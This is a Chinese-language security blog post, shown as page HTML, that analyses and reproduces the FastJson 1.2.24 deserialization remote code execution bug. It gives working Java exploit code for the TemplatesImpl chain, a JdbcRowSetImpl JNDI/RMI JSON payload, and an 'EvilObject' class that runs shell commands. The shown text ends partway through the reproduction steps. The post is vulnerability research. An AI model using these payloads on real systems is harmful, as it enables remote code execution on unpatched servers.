<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="FastJson是一个由alibaba维护的json库，应用范围很广。2017年3月15日由官方发布最早的安全公告。该公告表示FastJson在1.2.24及之前版本存在远程代码执行漏洞。紧接着于4月29日出现相关POC。这篇文章就是来分析复现这一漏洞。">
<meta property="og:type" content="article">
<meta property="og:title" content="FastJson反序列化回顾系列(一)">
<meta property="og:url" content="http://yoursite.com/2020/05/10/fastjson-1/index.html">
<meta property="og:site_name" content="Ananaskr&#39;s Blog">
<meta property="og:description" content="FastJson是一个由alibaba维护的json库，应用范围很广。2017年3月15日由官方发布最早的安全公告。该公告表示FastJson在1.2.24及之前版本存在远程代码执行漏洞。紧接着于4月29日出现相关POC。这篇文章就是来分析复现这一漏洞。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/3.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/4.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/6.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/7.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/8.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/9.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/10.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/3-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/4-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/5-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/6-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/7-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/8-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/9-1.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/1-2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/2-2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/3-2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/4-2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/5-2.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/11.png">
<meta property="og:image" content="http://yoursite.com/2020/05/10/fastjson-1/12.png">
<meta property="article:published_time" content="2020-05-10T15:15:50.000Z">
<meta property="article:modified_time" content="2020-05-20T15:07:46.850Z">
<meta property="article:author" content="ananaskr">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/05/10/fastjson-1/1.png">

<link rel="canonical" href="http://yoursite.com/2020/05/10/fastjson-1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>FastJson反序列化回顾系列(一) | Ananaskr's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ananaskr's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/About/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/10/fastjson-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ananaskr">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ananaskr's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          FastJson反序列化回顾系列(一)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-05-10 23:15:50" itemprop="dateCreated datePublished" datetime="2020-05-10T23:15:50+08:00">2020-05-10</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-05-20 23:07:46" itemprop="dateModified" datetime="2020-05-20T23:07:46+08:00">2020-05-20</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/JAVA%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">JAVA安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>FastJson是一个由alibaba维护的json库，应用范围很广。2017年3月15日由官方发布最早的<a href="https://github.com/alibaba/fastjson/wiki/security_update_20170315" target="_blank" rel="noopener">安全公告</a>。该公告表示FastJson在1.2.24及之前版本存在远程代码执行漏洞。紧接着于4月29日出现相关POC。这篇文章就是来分析复现这一漏洞。</p>
<a id="more"></a>


<h1 id="漏洞信息"><a href="#漏洞信息" class="headerlink" title="漏洞信息"></a>漏洞信息</h1><h2 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h2><ul>
<li>fastjson &lt;=1.2.24</li>
</ul>
<h2 id="漏洞原因"><a href="#漏洞原因" class="headerlink" title="漏洞原因"></a>漏洞原因</h2><p>漏洞产生的原因是由于fastjson反序列化Json字符串为Java对象时autoType没有做正确的检测处理。</p>
<h2 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h2><ul>
<li>TemplatesImpl类</li>
<li>JNDI注入-JdbcRowSetImpl类</li>
</ul>
<h1 id="利用链分析之TemplatesImpl类"><a href="#利用链分析之TemplatesImpl类" class="headerlink" title="利用链分析之TemplatesImpl类"></a>利用链分析之TemplatesImpl类</h1><h2 id="利用版本"><a href="#利用版本" class="headerlink" title="利用版本"></a>利用版本</h2><ul>
<li>1.2.22 &lt;= fastjson &lt;= 1.2.24</li>
</ul>
<blockquote>
<p>本来公告中表明的是FastJson在1.2.24及之前版本存在远程代码执行漏洞，但是由于此利用方式需要用到<code>Feature.SupportNonPublicField</code>属性，而该属性在1.2.22版本之后才开始提供相应的支持。</p>
</blockquote>
<h2 id="利用链"><a href="#利用链" class="headerlink" title="利用链"></a>利用链</h2><p>该反序列化漏洞利用链之前分析过的CommonsBeanUtils1中的后半部分payload，即利用TemplatesImpl类的<font color=#008000><code>getOutputProperties()</code></font>函数，调用到newTransformer()，从而RCE。之前利用commons-beanutils中的BeanComparator.compare()方法调用到getOutputProperties()的方法显然是行不通的。那么在这里，我们要解决的问题就是如何调用getOutputProperties()。</p>
<p>如果了解FastJson的反序列化，那么就很容易知道通过TemplatesImpl类成员变量<font color=#008000><code>_outputProperties</code></font>来自动调用<font color=#008000><code>getOutputProperties()</code></font>。如果不了解其反序列化，可以看这篇<a href="">文章</a>。</p>
<p>而在后续的过程中会用到_bytecodes中存放的恶意代码，因此_bytecodes必须是能够被反序列化的。来看看_bytecodes在TemplatesImpl中的情况。</p>
<p><img src="1.png" alt=""></p>
<p><img src="2.png" alt=""></p>
<p>它是一个私有属性，按理来说，它有一个setter方法，不知道是不是由于setter是个私有方法，所以不能被序列化。在这里要想_bytecodes被反序列化，需要设定parseObject()函数的参数<code>Feature.SupportNonPublicField</code>。  </p>
<p>接下来需要满足的条件就是需要能够调用到getOutputProperties()。这个getter方法正好满足p0’s师傅文章中所写的条件。FastJson会对满足下列要求的getter进行调用。</p>
<ul>
<li>只有getter没有setter</li>
<li>函数名称大于4</li>
<li>非静态函数</li>
<li>函数名称以get起始，且第四个字符为大写字母</li>
<li>函数没有入参</li>
<li>继承自Collection || Map || AtomicBoolean || AtomicInteger || AtomicLong</li>
</ul>
<p>来看看getOutputProperties()的情况。</p>
<p><img src="3.png" alt=""></p>
<p>它是一个Properties类，它继承自Hashtable，Hashtable又继承自Map。因此满足条件。</p>
<h2 id="EXP构造"><a href="#EXP构造" class="headerlink" title="EXP构造"></a>EXP构造</h2><p>首先可以通过前面Javassist的方式生成恶意的字节码。代码如下:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">test</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="class"><span class="keyword">class</span> <span class="title">StubTransletPayload</span> <span class="keyword">extends</span> <span class="title">AbstractTranslet</span> <span class="keyword">implements</span> <span class="title">Serializable</span> </span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">long</span> serialVersionUID = -<span class="number">5971610431559700674L</span>;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">transform</span><span class="params">(DOM document, SerializationHandler[] handlers)</span> <span class="keyword">throws</span> TransletException </span>&#123;&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">transform</span><span class="params">(DOM document, DTMAxisIterator iterator, SerializationHandler handler)</span> <span class="keyword">throws</span> TransletException</span>&#123;&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="comment">//in main()</span></span><br><span class="line">        String command = <span class="string">"/Applications/Calculator.app/Contents/MacOS/Calculator"</span>;</span><br><span class="line">        String cmd = <span class="string">"java.lang.Runtime.getRuntime().exec(\""</span> +</span><br><span class="line">                command.replaceAll(<span class="string">"\\\\"</span>,<span class="string">"\\\\\\\\"</span>).replaceAll(<span class="string">"\""</span>, <span class="string">"\\\""</span>) +</span><br><span class="line">                <span class="string">"\");"</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        ClassPool pool = ClassPool.getDefault();</span><br><span class="line">        pool.insertClassPath(<span class="keyword">new</span> ClassClassPath(StubTransletPayload<span class="class">.<span class="keyword">class</span>))</span>;</span><br><span class="line">        pool.insertClassPath(<span class="keyword">new</span> ClassClassPath(AbstractTranslet<span class="class">.<span class="keyword">class</span>))</span>;</span><br><span class="line">        CtClass clazz = pool.get(StubTransletPayload<span class="class">.<span class="keyword">class</span>.<span class="title">getName</span>())</span>;</span><br><span class="line"></span><br><span class="line">        clazz.makeClassInitializer().insertAfter(cmd);</span><br><span class="line">        CtClass superC = pool.get(AbstractTranslet<span class="class">.<span class="keyword">class</span>.<span class="title">getName</span>())</span>;</span><br><span class="line">        clazz.setSuperclass(superC);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">byte</span>[] classBytes = clazz.toBytecode();</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>然后获取TemplatesImpl.class，构造出序列化JSON数据，如下所示:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">String NASTY_CLASS = <span class="string">"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"</span>;</span><br><span class="line">String text1 = <span class="string">"&#123;\"@type\":\""</span> + NASTY_CLASS +</span><br><span class="line">                <span class="string">"\",\"_bytecodes\":[\""</span>+bytes1+<span class="string">"\"],'_name':'a.b','_tfactory':&#123; &#125;,\"_outputProperties\":&#123; &#125;,"</span> +</span><br><span class="line">                <span class="string">"\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"&#125;\n"</span>;</span><br></pre></td></tr></table></figure>

<p>在实际利用时，不能直接将获取的字节码转换为字符串进行拼接，而是需要经过一个base64编码变成字符串进行拼接。这个问题会在后面的细节问题中作出解释。</p>
<p>完整的demo如下所示:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.parser.Feature;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.DOM;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.TransletException;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;</span><br><span class="line"><span class="keyword">import</span> javassist.ClassClassPath;</span><br><span class="line"><span class="keyword">import</span> javassist.ClassPool;</span><br><span class="line"><span class="keyword">import</span> javassist.CtClass;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.codec.binary.Base64;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">test</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="class"><span class="keyword">class</span> <span class="title">StubTransletPayload</span> <span class="keyword">extends</span> <span class="title">AbstractTranslet</span> <span class="keyword">implements</span> <span class="title">Serializable</span> </span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">long</span> serialVersionUID = -<span class="number">5971610431559700674L</span>;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">transform</span><span class="params">(DOM document, SerializationHandler[] handlers)</span> <span class="keyword">throws</span> TransletException </span>&#123;&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">transform</span><span class="params">(DOM document, DTMAxisIterator iterator, SerializationHandler handler)</span> <span class="keyword">throws</span> TransletException</span>&#123;&#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line"></span><br><span class="line">        String command = <span class="string">"/Applications/Calculator.app/Contents/MacOS/Calculator"</span>;</span><br><span class="line">        String cmd = <span class="string">"java.lang.Runtime.getRuntime().exec(\""</span> +</span><br><span class="line">                command.replaceAll(<span class="string">"\\\\"</span>,<span class="string">"\\\\\\\\"</span>).replaceAll(<span class="string">"\""</span>, <span class="string">"\\\""</span>) +</span><br><span class="line">                <span class="string">"\");"</span>;</span><br><span class="line">        </span><br><span class="line">        ClassPool pool = ClassPool.getDefault();</span><br><span class="line">        pool.insertClassPath(<span class="keyword">new</span> ClassClassPath(StubTransletPayload<span class="class">.<span class="keyword">class</span>))</span>;</span><br><span class="line">        pool.insertClassPath(<span class="keyword">new</span> ClassClassPath(AbstractTranslet<span class="class">.<span class="keyword">class</span>))</span>;</span><br><span class="line">        CtClass clazz = pool.get(StubTransletPayload<span class="class">.<span class="keyword">class</span>.<span class="title">getName</span>())</span>;</span><br><span class="line"></span><br><span class="line">        clazz.makeClassInitializer().insertAfter(cmd);</span><br><span class="line">        CtClass superC = pool.get(AbstractTranslet<span class="class">.<span class="keyword">class</span>.<span class="title">getName</span>())</span>;</span><br><span class="line">        clazz.setSuperclass(superC);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">byte</span>[] classBytes = clazz.toBytecode();</span><br><span class="line"></span><br><span class="line">        String bytes1 = Base64.encodeBase64String(classBytes);</span><br><span class="line">        String NASTY_CLASS = <span class="string">"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"</span>;</span><br><span class="line">        String text1 = <span class="string">"&#123;\"@type\":\""</span> + NASTY_CLASS +</span><br><span class="line">                <span class="string">"\",\"_bytecodes\":[\""</span>+bytes1+<span class="string">"\"],'_name':'a.b','_tfactory':&#123; &#125;,\"_outputProperties\":&#123; &#125;,"</span> +</span><br><span class="line">                <span class="string">"\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"&#125;\n"</span>;</span><br><span class="line">        </span><br><span class="line">        Object res = JSON.parseObject(text1, Feature.SupportNonPublicField);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>运行之后的结果如下所示:</p>
<p><img src="4.png" alt=""></p>
<h2 id="漏洞利用细节"><a href="#漏洞利用细节" class="headerlink" title="漏洞利用细节"></a>漏洞利用细节</h2><h3 id="01-outputProperties如何与getOutputProperties-关联起来？"><a href="#01-outputProperties如何与getOutputProperties-关联起来？" class="headerlink" title="01._outputProperties如何与getOutputProperties()关联起来？"></a>01._outputProperties如何与getOutputProperties()关联起来？</h3><p>可以看到_outputProperties成员变量和getter方法getOutputProperties()之间相差了一个<font color=#008000><code>_</code></font>字符。是如何关联起来的呢？</p>
<p>这是由JavaBeanInfo.build进行处理的，FastJson会创建一个fieldList数组，用于保存目标Java类的成员变量以及相应的setter或getter方法，以供反序列化字段时调用。</p>
<p>FastJson会对setter、getter、成员变量分别进行处理，智能提取出成员变量信息。逻辑如下:</p>
<ol>
<li>识别setter方法名，并根据setter方法名提取出成员变量名。</li>
<li>通过clazz.getFields()获取成员变量。</li>
<li>识别getter方法名，并根据getter方法名提取出成员变量名。</li>
</ol>
<p>定位到JavaBeanInfo.build()函数中，来看一下，它是如何从getter方法中提取出成员变量的。可以看到，它是将第4个字符变成小写，然后拼接上后面的字符。</p>
<p><img src="6.png" alt=""></p>
<p>此时在fieldList中存入的是outputProperties与getOutputProperties之间的对应关系。还是没有对应上_outputProperties。继续看，接下来FastJson会语义分析JSON字符串。定位到JavaBeanDeserializer.parseField()函数</p>
<p><img src="7.png" alt=""></p>
<p>这里的key为_outputProperties。这里跟进一下smartMatch(key)。</p>
<p><img src="8.png" alt=""></p>
<p>这里会将_outputProperties这个成员变量与outputProperties相关联，从而也就与getOutputProperties()相关联了。</p>
<h3 id="02-为什么要对-bytecodes进行Base64编码"><a href="#02-为什么要对-bytecodes进行Base64编码" class="headerlink" title="02.为什么要对_bytecodes进行Base64编码?"></a>02.为什么要对_bytecodes进行Base64编码?</h3><p>在以往的情况下，并不需要对_bytecodes进行Base64编码。而我在newTransformer()函数中发现_bytecodes确实是Base64解码后字节码。那么是在什么地方进行了解码呢？</p>
<p>定位到ObjectArrayCodec.deserialze()</p>
<p><img src="9.png" alt=""></p>
<p>然后跟进byteValue()</p>
<p><img src="10.png" alt=""></p>
<p>在这里进行了base64解码。</p>
<h1 id="利用链分析之JNDI注入"><a href="#利用链分析之JNDI注入" class="headerlink" title="利用链分析之JNDI注入"></a>利用链分析之JNDI注入</h1><h2 id="JdbcRowSetImpl"><a href="#JdbcRowSetImpl" class="headerlink" title="JdbcRowSetImpl"></a>JdbcRowSetImpl</h2><p>由于此利用方式需要用到JNDI注入，对此不了解的可以先了解一下。此次利用JNDI注入需要满足2个条件:</p>
<ol>
<li>存在有漏洞的代码(即lookup(uri)，且uri可控)</li>
<li>Java版本(&lt;=jdk1.8_113) (RMI利用方式)</li>
</ol>
<p>有趣的是，第一点条件可利用<code>com.sun.rowset.JdbcRowSetImpl</code>类完成。定位到JdbcRowSetImpl类，搜索lookup函数，直接定位到<code>connect()</code>函数。</p>
<p><img src="3-1.png" alt=""></p>
<p>可以看到是很完美的漏洞触发代码，那么需要知道<code>this.getDataSourceName()</code>是否可控。跟进它。它取自<code>BaseRowSet</code>类的getDataSourceName()函数，且dataSource是个私有变量，可以通过其setter函数进行赋值。</p>
<p><img src="4-1.png" alt=""><br><img src="5-1.png" alt=""><br><img src="6-1.png" alt=""></p>
<p>而JdbcRowSetImpl类继承自BaseRowSet类，且重写了setDataSourceName()函数，定位到这个函数。</p>
<p><img src="7-1.png" alt=""></p>
<p>它会调用其父类即BaseRowSet类的setDataSourceName()函数，从而给dataSource赋值。</p>
<p>到这里为止，uri也可控了。但由于上述的connect()是protected类型的，不能直接被访问。所以找到了该类的setAutoCommit()函数。如下所示:</p>
<p><img src="8-1.png" alt=""></p>
<p>到这里，JdbcRowSetImpl类提供了一个可以进行JNDI注入的入口点。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.sun.rowset.JdbcRowSetImpl;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">client</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String args[])</span> <span class="keyword">throws</span>  Exception</span>&#123;</span><br><span class="line">        JdbcRowSetImpl jdbcRowSet = <span class="keyword">new</span> JdbcRowSetImpl();</span><br><span class="line">        jdbcRowSet.setDataSourceName(<span class="string">"rmi://127.0.0.1:1099/aa"</span>);</span><br><span class="line">        jdbcRowSet.setAutoCommit(<span class="keyword">true</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="EXP构造-1"><a href="#EXP构造-1" class="headerlink" title="EXP构造"></a>EXP构造</h3><p>因此，在进行fastjson反序列化时，需要调用该类的setDataSourceName函数和setAutoCommit函数。那么构造payload传入了<code>dataSourceName</code>变量和<code>autoCommit</code>值。</p>
<p>而实际上，在JdbcRowSetImpl类中并没有这两个成员变量，但传入的payload中若有这2个变量，便可调用对应的setter方法。非常神奇的一点认识。不过联想到fastjson反序列化时获取成员变量的一套逻辑，便可以想通了。</p>
<p>因此payload为:</p>
<font color=#008000>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">	&quot;@type&quot;:&quot;com.sun.rowset.JdbcRowSetImpl&quot;,</span><br><span class="line">	&quot;dataSourceName&quot;:&quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;&quot;,</span><br><span class="line">	&quot;autoCommit&quot;:true</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

</font>

<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><p>首先在web服务器上放入恶意的class文件。在所在目录下利用php内置服务器起一下(<code>php -S 0.0.0.0:2333</code>)。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.Runtime;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">EvilObject</span></span>&#123;</span><br><span class="line">	<span class="function"><span class="keyword">public</span> <span class="title">EvilObject</span><span class="params">()</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">		Runtime rt = Runtime.getRuntime();</span><br><span class="line">        String[] commands = &#123;<span class="string">"/bin/sh"</span>, <span class="string">"-c"</span>, <span class="string">"open /Applications/Calculator.app"</span>&#125;;</span><br><span class="line">        rt.exec(commands);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p>然后起一个rmi服务。</p>
